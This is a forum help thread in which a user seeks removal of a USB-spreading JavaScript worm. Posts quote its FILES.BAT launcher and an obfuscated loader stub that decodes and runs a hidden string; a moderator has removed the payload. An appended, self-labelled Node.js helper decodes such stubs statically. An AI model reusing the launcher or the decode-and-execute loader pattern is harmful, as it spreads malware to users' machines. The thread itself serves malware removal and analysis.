Virus wcpcabc.js in Windows 7

Toshiba Satellite c655-s5082 laptop
September 27, 2018 at 10:34:27
Specs: Windows 7 Ultimate (64 bits), Intel Core i3-2350M (2.3GHz) / Kingston 2x2gb DDR3
Hi Computing.net!

I am having trouble with a virus. It hides all files on a pendrive and creates a bat file named FILES.BAT, and this is the content:

cd Files\707\
%comspec% /c start w^script wcpcabc.js
exit

Then it creates a folder named 707 with the file wcpcabc.js inside.

I used USBFIX and Adwcleaner but with no results. I don't know how to terminate this infection; sadly I cannot reformat this PC because it contains licensed software and I don't have the keys.

Please somebody help me to find a solution.

Thanks in advance

Mobo: Intel(R) DG41RQ
CPU: Intel(R) Core(TM)2 Quad CPU Q8400 @ 2.66GHz
RAM: Kingston 4GB PC2-6400 (400 MHz)
Video: nVidia GEFORCE 8400GS 512MB
Audio: Realtek High Definition Audio



#1
September 27, 2018 at 12:14:01
To recover keys you might try using something like Belarc Advisor, or Sisandra Soft; or even something which I think is called Key Finder?

If you can download and boot with a rescue disk - and there are several about - that may allow you to deal with the pest?

This is a link to a selection of rescue disks.

http://tinyurl.com/ycxnanhm

These disks load a Linux-based OS into RAM only; the hard drive and any attached USB devices are merely resources which can be scanned - outside of Windows.

Likely Johnw and one or two other pest removal experts will drop across later; their advice is worth following and persevering with to the end.



#2
September 27, 2018 at 17:06:32
"I used USBFIX and Adwcleaner but no results"

Try Malwarebytes; more steps will be needed after this.

Run Malwarebytes Anti-Malware ( MBAM ) Use Threat Scan.
http://www.softpedia.com/get/Antivi...
http://www.freewarefiles.com/Malwar...
http://www.freewarefiles.com/screen...
http://www.malwarebytes.org/downloads/
Forum
http://www.malwarebytes.org/forums/
After the Free trial, I choose this.
http://fs5.directupload.net/images/...
You then get this screen.
http://fs5.directupload.net/images/...
Or,
Deactivate Malwarebytes for Windows Premium Trial
https://support.malwarebytes.com/do...
At the end of a scan, you will get something like this.
http://fs5.directupload.net/images/...
http://fs5.directupload.net/images/...
http://fs5.directupload.net/images/...
After clicking on > View Report & then > Export. Click 'Copy to Clipboard'
Paste the contents of the clipboard into your reply.



#3
September 27, 2018 at 17:26:21
Just out of curiosity, post the contents of this "wcpcabc.js". I do so love baby's first viruses, and so far this has all of the hallmarks of one.

How To Ask Questions The Smart Way



#4
September 28, 2018 at 05:58:26
Here is half of the code; I will not post the entire code since I don't want to spread the word lol, but if you want the file I can send it to you by mail.

This is it.

I'll try the other solutions you gave me people, thanks!


#5
September 28, 2018 at 18:59:29
That's a boring response. Post all of it, and I'll delete it once I get a look at it.


#6
September 29, 2018 at 06:41:17
Only if you promise to give me a solution :P


#7
September 29, 2018 at 07:50:30
Oh, I'll share what I find, if anything, but I'm from the server side. Fighting viruses is more Johnw's thing. I confront viruses differently. I mean, why fight a virus on its terms when I can just format and restore from backup?

message edited by Razor2.3



#8
September 29, 2018 at 11:27:18
Because I want to know what files this virus creates, all of them, then boot the machine with some Linux Live CD and delete all the traces of the virus. Just want to kill it sloooooowly :P

Well, here is the entire code, enjoy:

var a="There was stuff here. It's gone now. -Razor2.3",b=[30,48],c="",d=0,e,f=new ActiveXObject("Scripting.FileSystemObject");for(;d<a.length;d++){e=a.charCodeAt(d)-b[d%2];c+=String.fromCharCode(e<32?95+e:e)}try{f.MoveFolder=!0}catch(e){Function(c)()}

edited by moderator: Promise kept. -Razor2.3



#9
September 29, 2018 at 15:21:12
Got it. For reference, the main script is obfuscated. I left the deobfuscation code in place, because it really helped me get to the meat. It'll take a bit before I have much, as it was minimized and traditionally obfuscated before it was jumbled up. I can say it references websites registered in China, but powered by Cloudflare. They spared no every expense for this attack. Like a proper baby's first virus.

In the meantime, open Command Prompt and run the following:

taskkill /im wscript* /f

Let me know what it comes back with.

message edited by Razor2.3
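
A static decoder for the stub left in post #8, as an added example that is not part of the thread or anyone's post: it repeats the stub's arithmetic under Node.js and lists the COM objects and URLs in the decoded text without evaluating it. The sample string, the function names and the a.example host are constructed for illustration.

```javascript
// Added analysis helper (not from the thread). Run with Node.js; it never evaluates the decoded text.

// Constructed sample in the shape of the post #8 stub: harmless payload, reserved .example host.
const SAMPLE_DROPPER = `var a="-66P_43:56v !;$43XE(q41:/EL$'6+=EYY_M93E/jM_ ^$I >/=$_",b=[30,48],c="",d=0,e;`;

// Pull the encoded literal out of `var a="..."`. Assumption: only \" and \\ escapes occur,
// since the encoded alphabet is printable ASCII.
function extractPayload(source) {
  const m = /var\s+a\s*=\s*"((?:\\.|[^"\\])*)"/.exec(source);
  if (!m) throw new Error('no var a="..." literal found');
  return m[1].replace(/\\(.)/g, '$1');
}

// Read the alternating offsets from `b=[n,m]`; fall back to the values seen in the thread.
function extractKeys(source) {
  const m = /\bb\s*=\s*\[\s*(\d+)\s*,\s*(\d+)\s*\]/.exec(source);
  return m ? [Number(m[1]), Number(m[2])] : [30, 48];
}

// Same arithmetic as the stub's loop: subtract the key for this position and
// wrap anything below 32 back into printable ASCII (32..126).
function decodeStage(encoded, keys) {
  let out = '';
  for (let i = 0; i < encoded.length; i++) {
    const e = encoded.charCodeAt(i) - keys[i % keys.length];
    out += String.fromCharCode(e < 32 ? 95 + e : e);
  }
  return out;
}

// Static triage of the decoded text: COM objects it instantiates and URLs it mentions.
function triage(decoded) {
  const progIds = [...decoded.matchAll(/ActiveXObject\(\s*["']([^"']+)["']/g)].map(m => m[1]);
  const urls = decoded.match(/https?:\/\/[^\s"'<>)]+/g) || [];
  return { progIds, urls };
}

function analyze(source) {
  const decoded = decodeStage(extractPayload(source), extractKeys(source));
  return { decoded, ...triage(decoded) };
}

console.log(analyze(SAMPLE_DROPPER));
```

Working on a copy of the file renamed to .txt keeps a stray double-click from handing it to wscript.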



#10
September 29, 2018 at 19:12:40
I don't have the computer right now; it is in my office. I'll try on Monday.

Do you have a link with baby's virus background story?
